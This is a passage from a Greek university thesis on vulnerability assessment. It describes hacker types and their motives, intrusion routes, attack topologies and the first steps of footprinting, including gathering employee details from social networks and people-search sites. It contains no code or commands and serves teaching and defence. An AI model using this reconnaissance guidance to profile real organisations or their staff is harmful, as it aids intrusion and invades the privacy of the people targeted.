πόρους του ιδρύματος που φοιτούν, εξαπολύουν επιθέσεις με σκοπό κυρίως να

εντυπωσιάσουν τους φίλους τους, χωρίς φυσικά να συλληφθούν. Χρησιμοποιούν εργαλεία

τα οποία έχουν κατασκευαστεί από άλλους και το κίνητρο των εισβολών τους είναι κατά

βάση η διασκέδαση. Δεν έχουν ιδιαίτερες τεχνικές γνώσεις και ακολουθούν τη λογική point

click προσπαθώντας να προκαλέσουν καταστροφή χωρίς να ξέρουν τι ακριβώς κάνουν. Η

δράση τους γίνεται εύκολα αντιληπτή.

Υποαπασχολούμενοι Ενήλικες (Underemployed Adult Hackers):

Οι υποαπασχολούμενοι ενήλικες είναι πρώην Script Kiddies, οι οποίοι είτε εκδιώχθηκαν από

τη σχολή τους, είτε δεν κατάφεραν να βρουν μια εργασία πλήρους απασχόλησης28

. Οι

ενέργειές τους σχετίζονται με τη δημιουργία λογισμικού για το ξεκλείδωμα εμπορικών

εφαρμογών και τη συγγραφή ιομορφικού λογισμικού, ενώ τα εργαλεία που κατασκευάζουν

συχνά χρησιμοποιούνται από τους Script Kiddies. Οι επιθέσεις τους αποσκοπούν στην

απόκτηση φήμης μεταξύ των ομοίων τους, στον εντυπωσιασμό, στην απόσπαση

πληροφοριών και στην κοινοποίηση της αντίδρασής τους σε κυβερνητικούς και

επιχειρηματικούς φορείς.

Hackers από Ιδεολογία (Ideological Hackers):

Αυτή η ομάδα των Hacker εξαπολύει επιθέσεις αποσκοπώντας στην προβολή και προώθηση

κάποιας πολιτικής ιδεολογίας. Όταν υπάρχουν εθνικιστικά, πολιτικά ή περιβαλλοντικά

θέματα, τόσο σε τοπικό όσο και σε παγκόσμιο επίπεδο, παρατηρείται μια έξαρση τέτοιου

είδους επιθέσεων. Ειδικότερα, μετά το 2000, αυτού του είδους οι επιθέσεις αγγίζουν το

επίπεδο πλήρους πολέμου πληροφοριών. Οι επιθέσεις τους σχετίζονται με την αλλοίωση του

περιεχομένου ιστοσελίδων (Site Deface) ή επιθέσεις άρνησης παροχής υπηρεσίας (Denial Of

Service – DoS) εναντίον των ιδεολογικών τους αντιπάλων. Για να επιτύχουν τους σκοπούς

τους επιδιώκουν την προβολή των επιθέσεών τους από τα Μέσα Μαζικής Ενημέρωσης.

28 Strebe M., 2004, σελ. 21 – 22.

Page 43: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

43 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εγκληματίες Εισβολείς (Criminal Hackers):

Τα κίνητρα επιθέσεων αυτής της ομάδας Hacker είναι η απόκτηση κέρδους. Παρομοιάζονται

με τους κοινούς εγκληματίες και είναι αυτοί που κλέβουν αριθμούς πιστωτικών καρτών από

διακομιστές του Internet ή πραγματοποιούν εισβολές σε τραπεζικά συστήματα με σκοπό να

κλέψουν χρήματα. Συχνά, υπό την απειλή επίθεσης άρνησης υπηρεσίας, αποσπούν

οικονομικά οφέλη από επιχειρήσεις οι οποίες δραστηριοποιούνται στο χώρο του Internet.

Εταιρικοί Κατάσκοποι (Corporate Spies):

Είναι μια πιο σπάνια κατηγορία Hacker, οι οποίοι πληρώνονται αδρά από επιχειρήσεις ή και

κυβερνήσεις, με σκοπό να εισβάλουν σε ανταγωνιστικά πληροφοριακά συστήματα και να

αποσπάσουν πληροφορίες, η κατοχή των οποίων μπορεί να προσφέρει συγκριτικό

πλεονέκτημα.

Δυσαρεστημένοι Υπάλληλοι:

Οι υπάλληλοι, οι οποίοι είναι δυσαρεστημένοι από την συμπεριφορά της διοίκησης απέναντί

τους, έχουν το κίνητρο και τις ευκαιρίες να αποσπάσουν πληροφορίες που σχετίζονται με

την ασφάλεια των πληροφοριακών συστημάτων του οργανισμού στον οποίο εργάζονται και

να εισβάλουν σε αυτό προκαλώντας καταστροφές. Οι επιθέσεις αυτού του τύπο υ δεν

μπορούν να ανιχνευθούν πριν προκληθούν.

2.3 Τρόποι Εργασίας των Εισβολέων και Τοπολογίες Επίθεσης

2.3.1 Τρόποι Εργασίας των Εισβολέων

Ένας εισβολέας μπορεί να αποκτήσεις πρόσβαση σε ένα πληροφοριακό σύστημα με τους

εξής τέσσερις τρόπους29

• Απευθείας εισβολή. Για να πραγματοποιηθεί αυτού του τύπου η εισβολή απαιτείται ο

εισβολέας να έχει φυσική πρόσβαση στο πληροφοριακό σύστημα. Όσο και αν φαίνεται

παράξενο αυτό, δεν είναι δύσκολο να πραγματοποιηθεί. Με μια απλή δικαιολογία, π.χ.

προβλήματα στο τηλεφωνικό δίκτυο της περιοχής, μπορεί να βρεθεί στο χώρο φύλαξης

των υπολογιστών και σε μικρό χρονικό διάστημα να δημιουργήσει ένα λογαριασμό

διαχειριστή ή να εγκαταστήσει υλικό που θα το υ επιτρέψει να έχει απο μακρυσμένη

πρόσβαση. Για την αντιμετώπιση αυτού του τρόπου εισβολής απαιτείται ισχυρή φυσική

:

29 Strebe M., 2004, σελ. 24 – 27.

Page 44: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

44 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

ασφάλεια των εγκαταστάσεων και η χρήση Αναχώματος Ασφάλειας (Firewall) που θα

ελέγχει τις εξερχόμενες συνδέσεις.

• Εισβολή μέσω απομακρυσμένης πρόσβασης. Αν και αυτός ο τρόπος χρησιμοποιούνταν

παλιότερα και πλέον έχει αντικατασταθεί με εισβολή μέσω του Internet, δεν έχει

εξαλειφθεί τελείως. Πολλές εταιρείες επιτρέπουν σε υπαλλήλους τους να συνδέονται με

τον υπολογιστή του γραφείου τους ή με κεντρικούς υπολογιστές πελατών τους

προκειμένου να εκτελέσουν κάποια εργασία. Έτσι, μόντεμ τα οποία είναι διαμορφωμένα

να απαντούν σε κλήσεις απομακρυσμένης πρόσβασης μπορούν να αποτελέσουν σημείο

παράνομης εισόδου στο σύστημα. Τη λύση εδώ έρχεται να δώσει η τοποθέτηση των

διακομιστών απομακρυσμένης πρόσβασης έξω από το Firewall και μέσα στη δημόσια

ζώνη ασφάλειας, ώστε οι χρήστες να πιστοποιούνται πρώτα στο Firewall.

• Εισβολή μέσω Internet. Η συνηθισμένη πύλη εισόδου σε ένα πληροφορικό σύστημα

είναι μέσω των υπηρεσιών internet που τρέχουν σε ένα υπολογιστικό σύστημα.

Αναλυτικότερα παρουσίαση του θέματος ακολουθεί στη συνέχεια.

• Εισβολή μέσω ανασφαλών ασύρματων δικτύων. Τα πρωτόκολλα που

χρησιμοποιούνται για την ασύρματη δικτύωση είναι τα πλέον ανασφαλή και καθώς όλο

και περισσότερες συσκευές χρησιμοποιούν ασύρματη δικτύωση, αποτελούν εύκολη πύλη

εισόδου για τους εισβολείς.

2.3.2 Τοπολογίες Επίθεσης

Οι Hackers, προκειμένου να πραγματοποιήσουν μια επιτυχημένη εισβολή σε ένα

πληροφοριακό σύστημα, καταστρώνουν συγκεκριμένα σχέδια επίθεσης αξιοποιώντας στο

έπακρο τις γνώσεις, την εμπειρία και τα εργαλεία που έχουν στη διάθεσή τους. Το σχέδιο το

οποίο θα ακολουθήσουν είναι συναρτήσει του εξοπλισμού του στόχου, του τρόπου

πρόσβασής του στο Internet, του περιβάλλοντος δικτύου του και των μέτρων ασφάλειας του.

Μπορούμε να διακρίνουμε τέσσερα σχέδια επίθεσης30

:

2.3.2.1 Ένα προς Ένα (One to One)

Οι επιθέσεις αυτού του τύπου είναι εξατομικευμένες και πραγματοποιούνται από έναν

επιτιθέμενο προς ένα συγκεκριμένο στόχο – θύμα. Οι επιτιθέμενοι συχνά έχουν προσωπική

γνώση του στόχου τους. Τα κίνητρα αυτών των επιθέσεων μπορεί να είναι:

30 Joseph Migga Kizza, A Guide to Computer Network Security, σελ. 121-125, Spinger-Verlag, London 2009.

Page 45: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

45 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Συναισθηματικά: Ο επιτιθέμενος προκαλεί φυσική, ψυχολογική, ή οικονομική ζημία

στο στόχο - θύμα λόγω της φυλής, της υπηκοότητας, του φύλου, ή οποιασδήποτε άλλης

κοινωνικής ιδιότητας του θύματος.

• Προσωπική βεντέτα: Ο επιτιθέμενος γνωρίζει το στόχο του, θεωρεί ότι έχει υποστεί

βλάβη από αυτόν και επιδιώκει να τον εκδικηθεί.

• Προσωπικό κέρδος: Ο επιτιθέμενος αποσκοπεί στην απόσπαση πληροφοριών προς

οικονομικό του όφελος.

• Αστείο: Ο επιτιθέμενος δεν έχει κακόβουλες προθέσεις, απλά θέλει να διασκεδάσει.

• Επιχειρηματική κατασκοπεία: Ο επιτιθέμενος αποσκοπεί στην απόσπαση

πληροφοριών οι οποίες σχετίζονται με επιχειρηματικά σχέδια ή οικονομικά στοιχεία,

ώστε να τα αξιοποιήσει ως ανταγωνιστικό πλεονέκτημα.

Εικόνα 2.1: Επίθεση Ένα προς Ένα (One to One).

Πηγή: Joseph Migga Kizza, 2009.

2.3.2.2 Ένας προς Πολλούς (One to Many)

Σε αυτό τον τύπο επίθεσης, ο οποίος είναι ιδιαίτερα δημοφιλής τα τελευταία χρόνια

δεδομένου ότι είναι εύκολο να πραγματοποιηθεί, ο επιτιθέμενος δεν γνωρίζει προσωπικά

τους στόχους του και μπορεί να διατηρήσει την ανωνυμία του. Τα κίνητρα αυτού του τύπου

επίθεσης μπορεί να είναι:

• Συναισθηματικά: Ο επιτιθέμενος προκαλεί φυσική, ψυχολογική, ή οικονομική ζημία σε

μια ομάδα στόχων λόγω της φυλής, της υπηκοότητας, του φύλου, ή οποιασδήποτε άλλης

κοινωνικής ιδιότητας τους. Παράδειγμα αποτελούν οι επιθέσεις ηλεκτρονικού

ταχυδρομείου σε μέλη θρησκευτικών οργανώσεων.

• Προσωπική ικανοποίηση: Ο επιτιθέμενος ικανοποιείται και διασκεδάζει με το να βλέπει

άλλους ανθρώπους να ταλαιπωρούνται. Χαρακτηριστικά παραδείγματα αποτελούν οι

επιθέσεις μέσω ηλεκτρονικού ταχυδρομείου με τους ιούς “Love Bug,” “Killer Resume,”

και “Melissa.”

• Αστείο / Εξαπάτηση: Ο επιτιθέμενος θέλει να αστειευτεί ή να εξαπατήσει άλλους

ανθρώπους.

Page 46: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

46 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εικόνα 2.2: Επίθεση Ένα προς Πολλούς (One to Many).

Πηγή: Joseph Migga Kizza, 2009. 2.3.2.3 Πολλοί προς Έναν (Many to One)

Αυτές οι επιθέσεις, αν και δεν χρησιμοποιούνται συχνά, έχουν αποκτήσει πρόσφατα την

εύνοια της κοινότητας των Hackers και σχετίζονται με επιθέσεις Άρνηση Παροχής

Υπηρεσίας (Denial of Service – DoS). Ο επιτιθέμενος χρησιμοποιεί έναν κόμβος και μέσω

αυτού αποκτά πρόσβαση σε άλλους κόμβους. Αυτοί, οι δευτερεύοντες κόμβοι,

χρησιμοποιούνται για την παραγωγή μιας χιονοστιβάδας επιθέσεων σε έναν επιλεγμένο

στόχο. Δεδομένου ότι αυτού του τύπου επιθέσεις απαιτούν υψηλό βαθμό συντονισμού και

μια πολύ καλά εκτελεσμένη διαδικασία επιλογής, τόσο των δευτερευόντων κόμβους όσο και

του τελικού στόχου, απαιτούν ταυτόχρονα υψηλές γνώσεις προγραμματισμού και υποδομής

δικτύων. Τα κίνητρα αυτών των επιθέσεων συνοψίζονται στα ακόλουθα:

• Προσωπική βεντέτα: Υπάρχουν προσωπικοί λόγοι εκδίκησης, οι οποίοι οδηγούν τον

επιτιθέμενο να προκαλέσει τη μέγιστη δυνατή καταστροφή στο στόχο – θύμα.

• Το συναίσθημα αποτελεί κίνητρο όταν δεν υπάρχουν άλλοι λόγοι οι οποίοι να οδηγούν

τον επιτιθέμενο σε μια τέτοια πράξη καταστροφής.

• Τρομοκρατία: Η καταστροφή πληροφοριακών συστημάτων για την συγκάλυψη

αξιόποινων πράξεων καθώς και η πολιτική τρομοκρατία αποτελούν επίσης κίνητρα αυτού

του είδους των επιθέσεων.

• Προσοχή και φήμη: Σε μερικές ακραίες περιπτώσεις, αυτές οι επιθέσεις

χρησιμοποιούνται για την απόκτηση φήμης μέσα στην κοινότητα των Hackers, ιδιαίτερα

αν ο στόχος - θύμα αποτελεί πρόκληση. Ο σκοπός του επιτιθέμενου εδώ είναι διττός:

αφενός να επιδείξει τις γνώσεις του και αφετέρου να ικανοποιήσει τον εγωισμό του.

Page 47: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

47 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εικόνα 2.3: Επίθεση Πολλοί προς Ένα (Many to One).

Πηγή: Joseph Migga Kizza, 2009.

2.3.2.4 Πολλοί προς Πολλά (Many to Many)

Όπως και ο προηγούμενος τύπος επίθεσης, έτσι αυτός έχει αρχίσει σχετικά πρόσφατα να

χρησιμοποιείται, χωρίς να είναι ευρύτατα διαδεδομένος, και επίσης σχετίζονται με επιθέσεις

Άρνηση Παροχής Υπηρεσίας (Denial of Service – DoS). Σε αυτή τη μορφή επίθεσης, ο

επιτιθέμενος χρησιμοποιεί μια επιλεγμένη ομάδα από κόμβους, ως ενδιάμεση για να

εξαπολύσει επίθεση σε μια ομάδα στόχων. Ο αριθμός των ενδιάμεσων κόμβων που

χρησιμοποιούνται σε κάθε ομάδα ποικίλουν από λίγους έως μερικές χιλιάδες. Όπως και στην

προηγούμενη περίπτωση έτσι και σε αυτή απαιτούνται ικανότητες συντονισμού και υψηλές

γνώσεις προγραμματισμού και υποδομής δικτύων. Ως κίνητρα αυτών των τύπων επιθέσεων

μπορούμε να αναφέρουμε τα ακόλουθα:

• Η προσοχή και η φήμη μέσω της εκτεταμένης γνωστοποίησης μιας επιτυχημένης

επίθεσης.

• Τρομοκρατία: Η επιθυμία για την καταστροφή υποδομών που σχετίζονται με την

οικονομία, την πολιτική, την ασφάλεια, την άμυνα, είναι ένα ακόμα κίνητρο για την

εκδήλωση τέτοιου τύπου επιθέσεων.

• Διασκέδαση/εξαπάτηση: Η προσωπική ικανοποίηση και διασκέδαση την οποία αντλεί ο

επιτιθέμενος προκαλώντας καταστροφές.

Page 48: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

48 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εικόνα 2.4: Επίθεση Πολλοί προς Πολλά (Many to Many)

Πηγή: Joseph Migga Kizza, 2009.

2.4 Μεθοδολογία και τεχνικές Hacking31

Οι Hackers εργάζονται μεθοδικά για να συλλέξουν μια πληθώρα πληροφοριών ώστε να

εκτελέσουν μια επικεντρωμένη στο στόχο τους, χειρουργικής ακρίβειας επίθεση. Για το

λόγο αυτό, ακολουθούν συγκεκριμένη μεθοδολογία, την οποία θα παρουσιάσουμε, στη

συνέχεια, συνοπτικά.

2.4.1 Αναγνώριση Στόχου (Footprinting)

Αναγνώριση Στόχου (Footprinting) είναι η συστηματική και μεθοδική αναγνώριση του

στόχου. Μέσω αυτής της διαδικασίας, οι Hackers, μπορούν να συλλέγουν τμήματα

πληροφοριών, τα οποία σχετίζονται με τις τεχνολογίες και το περιβάλλον λειτουργίας του

στόχου τους και να δημιουργήσουν ένα προ φίλ του ο ργανισμού και της ασφάλειας που

εφαρμόζει. Χρησιμοποιώντας ένα συνδυασμό εργαλείων, τεχνικών, υπομονής, γνώσης και

ευστροφίας μπορούν να πάρουν μια άγνωστη οντότητα (οργανισμός-στόχος) και να την

περιορίσουν σε μια συγκεκριμένη περιοχή από domain names, network blocks, υποδίκτυα,

δρομολογητές, μεμονωμένες διευθύνσεις ΙΡ, καθώς και άλλες λεπτομέρειες σχετικές με τα

μέτρα ασφάλειας που εφαρμόζει.

31 Scambray J.- McClure S. – Kurtz G., Hacking Exposed: Network Security Secrets & Solutions, Sixth Edition,

McGraw-Hill, 2009

Page 49: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

49 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Παρόλο που υπάρχουν πολλές μέθοδοι αναγνώρισης και συλλογής πληροφοριών όλες

στοχεύουν, κυρίως στην ανακάλυψη στοιχείων τα οποία σχετίζονται με τις τεχνολογίες που

παρουσιάζονται στο επόμενο πίνακα.

Τεχνολογία Πληροφορίες που μπορούν να συλλεχτούν Internet • Domain names

• Περιοχή διευθύνσεων δικτύου • Διευθύνσεις ΙΡ των συστημάτων που είναι προσπελάσιμα μέσω Internet • Υπηρεσίες TCP και UDP που τρέχουν σε κάθε εντοπισμένο σύστημα • Αρχιτεκτονική συστήματος (Sparc vs x86) • Μηχανισμοί ελέγχου προσπέλασης και σχετιζόμενες λίστες ελέγχου

προσπέλασης (Access Control Lists – ACL) • Συστήματα εντοπισμού εισβολών (Intrusion Detection Systems – IDS) • Ενεργητική συλλογή πληροφοριών συστήματος (ονόματα χρηστών και ομάδων,

προτροπές και μηνύματα συστήματος – banners, πίνακες δρομολόγησης, πληροφορίες SNMP)

• DNS hostnames Intranet • Χρησιμοποιούμενα πρωτόκολλα δικτύωσης (π.χ. IP, IPX, DecNET, κλπ)

• Εσωτερικά Domain names • Περιοχή διευθύνσεων δικτύου • Διευθύνσεις ΙΡ των συστημάτων που είναι προσπελάσιμα μέσω Intranet • Υπηρεσίες TCP και UDP που τρέχουν σε κάθε εντοπισμένο σύστημα • Αρχιτεκτονική συστήματος (Sparc vs x86) • Μηχανισμοί ελέγχου προσπέλασης και σχετιζόμενες λίστες ελέγχου

προσπέλασης (Access Control Lists – ACL) • Συστήματα εντοπισμού εισβολών (Intrusion Detection Systems – IDS) • Ενεργητική συλλογή πληροφοριών συστήματος (ονόματα χρηστών και ομάδων,

προτροπές και μηνύματα συστήματος – banners, πίνακες δρομολόγησης, πληροφορίες SNMP)

Απομακρυσμένη πρόσβαση

• Αριθμοί αναλογικών/ψηφιακών τηλεφωνικών γραμμών • Τύπος απομακρυσμένου συστήματος • Μηχανισμοί πιστοποίησης ταυτότητας • Δίκτυα VPN και σχετιζόμενα πρωτόκολλα (IPSec και PPTP)

Extranet • Domain names • Προέλευση και προορισμός σύνδεσης • Τύπος σύνδεσης • Μηχανισμοί ελέγχου πρόσβασης

Πίνακας 2-1: Οι διάφορες τεχνολογίες και οι κρίσιμες πληροφορίες που μπορεί να συλλέξει ένας Hacker

Πηγή: Scambray J.- McClure S. – Kurtz G.,2009

Η αναγνώριση στόχου είναι απαραίτητη για τη συστηματική και μεθοδική διασφάλιση της

ταυτότητας και της εγκυρότητας όλων των στοιχείων πληροφορίας που σχετίζονται με τις

προαναφερθείσες τεχνολογίες. Εάν δεν υπάρχει η σωστή μεθοδολογία για τη συγκέντρωση

όλων αυτών πληροφοριών, είναι πολύ πιθανό να αγνοηθούν στοιχεία τα οποία σχετίζονται

με μια συγκεκριμένη τεχνολογία ή οργανισμό.

Page 50: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

50 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Στη συνέχεια θα αναφερθούμε συνοπτικά στην αναγνώριση των συνδέσεων ενός

οργανισμού στο Internet. Πολλές από τις τεχνικές αυτές μπορούν να χρησιμοποιηθούν και

στις υπόλοιπες τεχνολογίες που αναφέρθηκαν στον προηγούμενο πίνακα. Η διαδικασία

αναγνώρισης στόχου ακολουθεί τα εξής διακριτά βήματα.

ΒΗΜΑ 1: Καθορισμός εύρους δραστηριοτήτων.

Αρχικά, ο επιτιθέμενος αποφασίζει αν θα συλλέξει πληροφορίες για ολόκληρο τον

οργανισμό-στόχο ή αν θα επικεντρωθεί σε ένα μόνο τμήμα αυτού (π.χ. κεντρικά γραφεία).

Αυτό γίνεται γιατί πολλές φορές οι συγκέντρωση στοιχείων για όλες τις οντότητες οι οποίες

σχετίζονται με τον οργανισμό είναι μια εξαιρετικά επίπονη διαδικασία.

ΒΗΜΑ 2: Συλλογή δημοσιευμένων διαθέσιμων πληροφοριών.

Μια πληθώρα πληροφοριών που σχετίζονται με τον οργανισμό-στόχο, τους εργαζόμενους,

τα οικονομικά στοιχεία κ.α. είναι διαθέσιμα και εύκολο να ανακτηθούν από το Internet.

Χωρίς να εξαντλήσουμε το θέμα, θα παρουσιάσουμε τα κυριότερα σημεία. Οι επιτιθέμενοι

μπορούν να αναζητήσουν στοιχεία από:

• Τον ιστότοπο (web site) της εταιρείας: Συχνά το web site μιας εταιρείας μπορεί να

παρέχει πολύ χρήσιμες πληροφορίες σε έναν Hacker. Αυτές οι πληροφορίες αφορούν:

− λίστες των ρυθμίσεων ασφάλειας και των αγαθών του οργανισμού

− τυχόν ξεχασμένα σχόλια στον πηγαίο κώδικα HTML

− άλλες πηγές άντλησης στοιχείων από παρακείμενες της βασικής σελίδες όπως www1,

www2, web, web1, test, test1, κ.α.

− URL για απομακρυσμένη πρόσβαση μέσω ενός web browser π.χ.

http://outlook.xxxxxx.com/, http://owa. xxxxxx.com/ ή http://www.openconnect.com/.

− οδηγίες για download και ρυθμίσεις ενός VPN λογισμικού, καθώς επίσης τηλέφωνα

και ονόματα επαφών για παροχή βοήθειας.

• Συνεργαζόμενοι οργανισμοί: Ακόμα και αν ένας οργανισμός είναι προσεκτικός ως προς

τις πληροφορίες που κοινοποιεί, δεν είναι απαραίτητο να συμβαίνει το ίδιο και με άλλους

οργανισμούς οι οποίοι συνεργάζονται μαζί του. Οι συνεργαζόμενες εταιρείες μπορούν να

παρέχουν στοιχεία τα οποία αν συνδυαστούν με άλλα ενδέχεται να εκθέσουν ευαίσθητες

πληροφορίες του οργανισμού, π.χ. από μια εταιρεία η οποία έχει κάνει σχεδιασμό και

ανάπτυξη web εφαρμογών για λογαριασμό του οργανισμού είναι πιθανό να βρεθεί ο

συγγραφέας ενός αρχείου και το στοιχείο αυτό να χρησιμοποιηθεί σε μια επίθεση

κοινωνικής μηχανικής.

Page 51: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

51 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Στοιχεία φυσικής διεύθυνσης: Η γνώση της φυσικής διεύθυνσης του οργανισμού

στόχου μπορεί να χρησιμοποιηθεί αφενός για μη τεχνικές επιθέσεις, όπως επιθέσεις

κοινωνικής μηχανικής, αφετέρου για μη εξουσιοδοτημένη πρόσβαση σε κτίρια, δίκτυα,

υπολογιστές, φορητές συσκευές κλπ. Επιπλέον ο επιτιθέμενος έχει τη δυνατότητα να

αποκτήσει οπτική επαφή του στόχου μέσω δωρεάν υπηρεσιών στο διαδίκτυο π.χ. του

Google Earth.

• Στοιχεία Εργαζομένων: Τα στοιχεία επικοινωνίας ενός οργανισμού παρέχουν πολλές

χρήσιμες πληροφορίες:

− Μέσω του τηλεφώνου επικοινωνίας μπορεί να εντοπιστεί η φυσική διεύθυνση του

οργανισμού ή να αποσπαστούν περισσότερες πληροφορίες από μια επίθεση

κοινωνικής μηχανικής.

− Τα ονόματα υπευθύνων επικοινωνίας και οι διευθύνσεις e-mail είναι χρήσιμα

δεδομένα. Οι περισσότεροι οργανισμοί χρησιμοποιούν κάποια παράγωγα των

ονομάτων των εργαζομένων στο e-mail ή το όνομα χρήστη (username) τους. Η γνώση

ενός από αυτά μπορεί να οδηγήσει στο σχηματισμό περισσότερων, να επιτρέψει την

πρόσβαση στο σύστημα ή να χρησιμοποιηθεί σε επίθεση κοινωνικής μηχανικής για

απόκτηση περισσότερων πληροφοριών.

− Επίσης, από τα ονόματα των υπευθύνων επικοινωνίας μπορούν να βρεθούν

προσωπικές πληροφορίες τους όπως το τηλέφωνο και η διεύθυνση του σπιτιού τους, ο

αριθμός κοινωνικής τους ασφάλισής, το ποινικό τους μητρώο κ.α. με αναζήτηση σε

sites όπως το http://www.blackbookonline.info/ και http://www.peoplesearch.com/.

− Ευπάθειες και αδυναμίες ενός οργανισμού μπο ρούν να αναζητηθο ύν και μέσω τις

συλλογής προσωπικών πληροφοριών για τους παρόντες και προηγούμενους

υπαλλήλους του οργανισμού. Τα σημεία που μπορούν να αναζητηθούν αυτές οι

πληροφορίες είναι τα sites κοινωνικής δικτύωσης (Facebook.com, Myspace.com,

Reunion.com, Classmates.com), επαγγελματικών δικτύων (Linkedin.com, Plaxo.com),

διαχείρισης καριέρας (Monster.com, Careerbuilder.com), οικογενειακής καταγωγής

(Ancestry.com), και διαχείρισης online φωτογραφιών (Flickr.com, Photobucket.com).

− Τα ονόματα συνεργατών είναι επίσης άλλη μια πηγή πληροφόρησης για τους

επιτιθέμενους. Από τα sites τους μπορούν να αντλήσουν πληροφορίες οι οποίες

κατόπιν παραγωγικής σκέψης να τους αποκαλύψουν πληροφορίες για τις ρυθμίσεις

ασφάλειας και τις αδυναμίες του οργανισμού.

− Τέλος, ένα ακόμα αξιοποιήσιμο στοιχείο αποτελεί ο υπολογιστή που έχει ένας

εργαζόμενος στο σπίτι του, από τον οποίο ενδέχεται να χρησιμοποιεί κάποιο είδος

απομακρυσμένης πρόσβασης με τον οργανισμό. Με τη χρήση ενός keystroke logger ο

Page 52: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

